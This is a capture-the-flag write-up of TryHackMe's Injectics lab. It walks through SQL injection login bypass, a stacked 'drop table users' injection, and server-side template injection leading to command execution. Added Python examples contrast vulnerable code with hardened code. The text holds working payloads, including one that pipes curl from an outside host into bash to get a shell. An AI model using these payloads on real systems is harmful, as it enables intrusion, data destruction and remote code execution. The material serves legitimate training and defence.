
Understanding Injectics CTF

Tags: cybersecurity, CTF, injection, webapp, exploitation

Injectics is a Capture The Flag (CTF) challenge on TryHackMe that focuses on honing your injection skills to take control of a web application. This guide walks you through the steps to exploit vulnerabilities and gain administrative access.

Key Points

  • Initial Scan: Use nmap to identify open ports and services.
  • Information Gathering: Analyze source code and accessible files for clues.
  • SQL Injection: Exploit weak sanitization in login forms.
  • Template Injection: Utilize Server-Side Template Injection (SSTI) for further exploitation.
  • Shell Access: Gain reverse shell access to retrieve the final flag.

Initial Scan

Perform an nmap scan to identify open ports and services:

nmap -sC -sV -T4 XX.XX.XXX.XXX -oN initial

Key findings:

PORT   STATE   SERVICE   VERSION
22     open    ssh       OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80     open    http      Apache httpd 2.4.41 ((Ubuntu))

Port 80 is open and running Apache httpd.

Information Gathering

  1. Visit the Website: Access the web application on port 80.

  2. Source Code Analysis: Inspect the source code for comments or hidden information.

    <!-- Mails are stored in mail.log file-->
    
  3. Access mail.log: Navigate to http://XX.XX.XXX.XXX/mail.log to find sensitive information.

    From: dev@injectics.thm
    To: superadmin@injectics.thm
    Subject: Update before holidays
    
    Hey,
    
    Before heading off on holidays, I wanted to update you on the latest changes to the website. I have implemented several enhancements and enabled a special service called Injectics. This service continuously monitors the database to ensure it remains in a stable state.
    
    To add an extra layer of safety, I have configured the service to automatically insert default credentials into the `users` table if it is ever deleted or becomes corrupted. This ensures that we always have a way to access the system and perform necessary maintenance. I have scheduled the service to run every minute.
    
    Here are the default credentials that will be added:
    
    | Email                     | Password              |
    |---------------------------|-----------------------|
    | superadmin@injectics.thm  | superSecurePasswd101  |
    | dev@injectics.thm         | devPasswd123          |
    
    Please let me know if there are any further updates or changes needed.
    
    Best regards,
    Dev Team
    
    dev@injectics.thm
    

SQL Injection

  1. Analyze script.js: Inspect the JavaScript file used for the login form.

    // Client-side check from the site's script.js. It runs only in the browser
    // before the form submits, so a request sent directly (e.g. via Burp Suite)
    // never passes through it. The wrapper function name is assumed; the page
    // shows only the loop body.
    function validateUsername(username) {
        const invalidKeywords = ['or', 'and', 'union', 'select', '"', "'"];
        for (let keyword of invalidKeywords) {
            if (username.includes(keyword)) {
                alert('Invalid keywords detected');
                return false;
            }
        }
        return true;
    }
    
  2. Bypass Sanitization: Use Burp Suite to intercept and modify the login request.

    username=a' || 1=1 -- -&password=a&function=login
    

    Successful login as admin.

Delete Users Table

  1. Admin Dashboard: Use the admin dashboard to perform SQL injection.

    rank=1&country=&gold=23;drop table users -- -&silver=21&bronze=12345
    

    The page displays: Seems like database or some important table is deleted. InjecticsService is running to restore it. Please wait for 1-2 minutes.

  2. Login with Default Credentials: Wait for the service to restore the table and login with the credentials found in mail.log.
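
The following is an added worked example (not the lab's PHP source) covering both the login bypass and the dashboard `drop table` injection above: a query built by string formatting beside its parameterised replacement. It uses an in-memory SQLite database in place of the lab's MySQL backend, so the `users` and `medals` tables, their columns and the exact query shapes (`login_query_vulnerable`, `update_medals_vulnerable`, `update_medals_hardened`) are assumptions about how the application is built; the default credentials are the two quoted from mail.log. MySQL reads `||` as logical OR by default, which is why the walkthrough's login payload works there; SQLite treats `||` as string concatenation, so the vulnerable login is shown as the query text it produces rather than executed.

```python
import sqlite3

# Constructed sample data for this example: the default credentials are the
# ones quoted from mail.log, the medals row is invented.
DEFAULT_USERS = [
    ("superadmin@injectics.thm", "superSecurePasswd101"),
    ("dev@injectics.thm", "devPasswd123"),
]


def fresh_db():
    """In-memory SQLite database standing in for the lab's MySQL backend (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (email TEXT, password TEXT);
        CREATE TABLE medals (rank INTEGER, country TEXT,
                             gold INTEGER, silver INTEGER, bronze INTEGER);
        INSERT INTO medals VALUES (1, 'Examplestan', 10, 5, 3);
    """)
    conn.executemany("INSERT INTO users VALUES (?, ?)", DEFAULT_USERS)
    return conn


def login_query_vulnerable(username, password):
    """Query text built by string formatting (assumed shape of the lab's login).

    The keyword filter in script.js never sees a request sent directly, so the
    payload reaches this string unchanged: the `-- -` comments out the password
    check, and on MySQL `||` is OR, so the WHERE clause is always true.
    """
    return (f"SELECT email FROM users "
            f"WHERE email='{username}' AND password='{password}'")


def login_hardened(conn, username, password):
    """Parameterised query: the input is bound as a value, never parsed as SQL."""
    row = conn.execute(
        "SELECT email FROM users WHERE email=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def update_medals_vulnerable(conn, fields):
    """Dashboard update with formatted SQL and multi-statement execution.

    executescript() runs every statement in the string, which is what lets the
    stacked `;drop table users` in the gold field take effect.
    """
    sql = ("UPDATE medals SET gold={gold}, silver={silver}, bronze={bronze} "
           "WHERE rank={rank} AND country='{country}'").format(**fields)
    conn.executescript(sql)
    return sql


def update_medals_hardened(conn, fields):
    """Validate types first, then bind parameters. Returns False when input is rejected."""
    try:
        values = (int(fields["gold"]), int(fields["silver"]), int(fields["bronze"]),
                  int(fields["rank"]), fields["country"])
    except ValueError:
        return False  # "23;drop table users -- -" is not an integer
    conn.execute(
        "UPDATE medals SET gold=?, silver=?, bronze=? WHERE rank=? AND country=?",
        values,
    )
    return True


def table_exists(conn, name):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (name,)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    # Form fields exactly as in the walkthrough's dashboard request.
    form = {"rank": "1", "country": "", "gold": "23;drop table users -- -",
            "silver": "21", "bronze": "12345"}
    db = fresh_db()
    print(login_query_vulnerable("a' || 1=1 -- -", "a"))
    print(login_hardened(db, "a' || 1=1 -- -", "a"))                   # None
    print(update_medals_hardened(db, form), table_exists(db, "users"))  # False True
    update_medals_vulnerable(db, form)
    print(table_exists(db, "users"))                                   # False
```

Two design points follow from the run. Parameter binding alone already stops the stacked statement (the whole gold field is stored as one value), and the integer check turns a silent bad write into a rejected request that can be logged. The lab's "InjecticsService" is the other lesson: a recovery job that reinserts documented default credentials converts a destructive injection into an authentication bypass, so a restore path should recreate schema, not accounts.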

Template Injection

  1. Update Profile: Navigate to update_profile.php and test for Server-Side Template Injection (SSTI).

    {{2*2}}
    

    The dashboard displays: Welcome, 4!

  2. Exploit SSTI: Use payloads to execute system commands.

    {{['id',""]|sort('passthru')}}
    

    Output: Welcome, uid=33(www-data) gid=33(www-data) groups=33(www-data) Array!
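
The following is an added worked example of the mechanism behind the `{{2*2}}` probe: the profile page pastes user input into the template source, so the engine evaluates it instead of displaying it. This is not the lab's PHP or its template engine. `render` is a deliberately tiny toy engine (arithmetic and variable lookup only, no function calls, so it cannot reach `passthru` or anything like it), `welcome_vulnerable` and `welcome_hardened` are assumed shapes of the profile page's greeting, and `probe_evaluated` is a regression check a developer could keep in a test suite for any field that is reflected back to the user.

```python
import ast
import operator
import re

# Operators the toy engine may evaluate: enough for the {{2*2}} probe and
# nothing that touches the process, filesystem or any function.
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}
_TAG = re.compile(r"\{\{(.*?)\}\}")


def _eval(node, context):
    """Evaluate a whitelisted AST: numbers, string literals, names, and + - *."""
    if isinstance(node, ast.Expression):
        return _eval(node.body, context)
    if isinstance(node, ast.Constant) and isinstance(node.value, (int, str)):
        return node.value
    if isinstance(node, ast.Name):
        return context[node.id]
    if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
        return _OPS[type(node.op)](_eval(node.left, context),
                                   _eval(node.right, context))
    raise ValueError(f"unsupported template expression: {ast.dump(node)}")


def render(template_source, context=None):
    """Replace every {{ expr }} in the template SOURCE with its evaluated value.

    Values substituted in are not re-scanned, which is the property the
    hardened variant relies on.
    """
    context = context or {}

    def replace(match):
        tree = ast.parse(match.group(1).strip(), mode="eval")
        return str(_eval(tree, context))

    return _TAG.sub(replace, template_source)


def welcome_vulnerable(display_name):
    """Anti-pattern behind the lab's SSTI (assumed shape): the user's name is
    concatenated into the template source, so the engine parses it as code."""
    return render("Welcome, " + display_name + "!")


def welcome_hardened(display_name):
    """Template source is a constant; the name enters only as a context value,
    so a string such as '{{2*2}}' is reflected verbatim."""
    return render("Welcome, {{ name }}!", {"name": display_name})


def probe_evaluated(response_text, probe="{{2*2}}"):
    """Regression check: True if the arithmetic probe was evaluated (bug present),
    False if the page reflected it unchanged."""
    expected = render(probe)
    return expected in response_text and probe not in response_text


if __name__ == "__main__":
    print(welcome_vulnerable("{{2*2}}"))   # Welcome, 4!   (same signal as the lab)
    print(welcome_hardened("{{2*2}}"))     # Welcome, {{2*2}}!
    print(probe_evaluated(welcome_vulnerable("{{2*2}}")))  # True
    print(probe_evaluated(welcome_hardened("{{2*2}}")))    # False
```

The fix is not a filter on `{{`: it is keeping template source static and passing user data through the context. The `probe_evaluated` check also doubles as a detection rule for application logs, since a reflected field whose stored value is `{{2*2}}` but whose rendered page shows `4` is the exact symptom the walkthrough observed.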

Shell Access

  1. Create Reverse Shell: Use a reverse shell payload to gain access.

    {{['curl XX.XX.XX.XX|bash',""]|sort('passthru')}}
    

    Successfully gained reverse shell access and retrieved the second flag.

Learn More

For more detailed information on injection techniques and CTF challenges, explore resources on TryHackMe and other cybersecurity platforms.